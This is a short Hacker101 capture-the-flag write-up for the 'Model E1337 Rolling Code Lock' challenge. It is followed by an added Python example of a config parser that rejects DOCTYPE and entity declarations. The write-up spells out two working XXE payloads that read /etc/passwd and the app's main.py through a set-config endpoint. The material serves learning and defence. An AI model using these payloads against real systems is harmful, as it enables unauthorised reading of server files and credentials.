Hacker101 CTF Writeup


Model E1337 - Rolling Code Lock - FLAG0

0x00 Home

Tried a couple of different codes, but they all show errors.

Code incorrect. Expected 06947342

0x01 Directory

Try scanning for subdirectories with Burp.

There is also a comment in the source code.

0x02 get-config

Looks like some kind of config using XML.

0x03 set-config

It actually exists, but may need a parameter to set the XML.

0x04 XXE

Prepare the XXE payload.

<?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "/etc/passwd">]><config><location>&xxe;</location></config>

Then encode it in URL format.

The XXE payload is written successfully, the response is a 302 redirect to the admin page, and /etc/passwd is read out.

0x05 main.py

<?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "main.py">]><config><location>&xxe;</location></config>

Execute it and get the FLAG in main.py.
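
How a set-config style handler could refuse both payloads above, as an added example that is not part of the original writeup or the challenge's code. The names `parse_config`, `ForbiddenXML` and `ALLOWED_KEYS` are hypothetical, and the flat `<config><location>` schema is assumed from the payload shown on this page.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat

# Hypothetical schema: <location> is the only key the page's payload shows.
ALLOWED_KEYS = {"location"}


class ForbiddenXML(ValueError):
    """Config document rejected before any value is used."""


def _forbid(*_args):
    # Fired by expat for a DOCTYPE or an <!ENTITY ...> declaration.
    raise ForbiddenXML("DOCTYPE and entity declarations are not allowed")


def _reject_dtd(data: bytes) -> None:
    """Pre-scan with expat and abort at the first DTD construct."""
    scanner = expat.ParserCreate()
    scanner.StartDoctypeDeclHandler = _forbid
    scanner.EntityDeclHandler = _forbid
    try:
        scanner.Parse(data, True)
    except expat.ExpatError as exc:
        raise ForbiddenXML(f"malformed XML: {exc}") from exc


def parse_config(data: bytes) -> dict:
    """Return {key: text} for a flat <config> document, or raise ForbiddenXML."""
    _reject_dtd(data)
    root = ET.fromstring(data)
    if root.tag != "config":
        raise ForbiddenXML("root element must be <config>")
    cfg = {}
    for child in root:
        if child.tag not in ALLOWED_KEYS or len(child):
            raise ForbiddenXML(f"unexpected element <{child.tag}>")
        cfg[child.tag] = (child.text or "").strip()
    return cfg


# Constructed benign input, and the /etc/passwd payload quoted on this page.
BENIGN = b'<?xml version="1.0"?><config><location>Front door</location></config>'
PAGE_PAYLOAD = (b'<?xml version="1.0"?><!DOCTYPE root [<!ENTITY xxe SYSTEM '
                b'"/etc/passwd">]><config><location>&xxe;</location></config>')

if __name__ == "__main__":
    print(parse_config(BENIGN))
    try:
        parse_config(PAGE_PAYLOAD)
    except ForbiddenXML as err:
        print("rejected:", err)
```

Because the document is rejected at the DOCTYPE itself, the same check covers the `main.py` variant without needing a list of sensitive paths.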